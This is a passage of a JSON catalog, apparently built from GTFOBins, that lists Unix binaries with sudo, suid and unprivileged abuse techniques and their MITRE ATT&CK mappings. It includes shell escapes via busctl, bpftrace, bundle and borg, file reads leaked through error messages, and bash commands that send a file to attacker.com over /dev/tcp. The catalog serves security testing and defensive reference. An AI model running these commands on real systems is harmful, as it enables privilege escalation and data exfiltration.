installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bashbug:inherit:0:sudo","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bashbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bashbug:inherit:0:unprivileged","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bashbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:batcat:inherit:0:sudo","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/batcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:batcat:inherit:0:suid","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/batcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:batcat:inherit:0:unprivileged","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/batcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bbot:file-read:0:sudo","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bbot:file-read:0:unprivileged","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bc:file-read:0:sudo","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bc:file-read:0:suid","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bc:file-read:0:unprivileged","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:file-read:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:file-read:0:suid","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:file-read:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:shell:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:shell:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bee:inherit:0:sudo","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bee:inherit:0:suid","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bee:inherit:0:unprivileged","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:borg:shell:0:sudo","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/borg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:borg:shell:0:unprivileged","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/borg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bpftrace:shell:0:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace --unsafe -e 'BEGIN {system(\"/bin/sh 1<&0\");exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bpftrace:shell:1:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'BEGIN {system(\"/bin/sh 1<&0\");exit()}' >/path/to/temp-file\nbpftrace --unsafe /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bpftrace:shell:2:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace -c /bin/sh -e 'END {exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bridge:file-read:0:sudo","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bridge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bridge:file-read:0:suid","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bridge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bridge:file-read:0:unprivileged","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bridge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bundle:inherit:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:inherit:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:inherit:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:inherit:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:2:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:2:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:busctl:inherit:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:inherit:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:inherit:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:1:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:1:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:1:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Execution"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 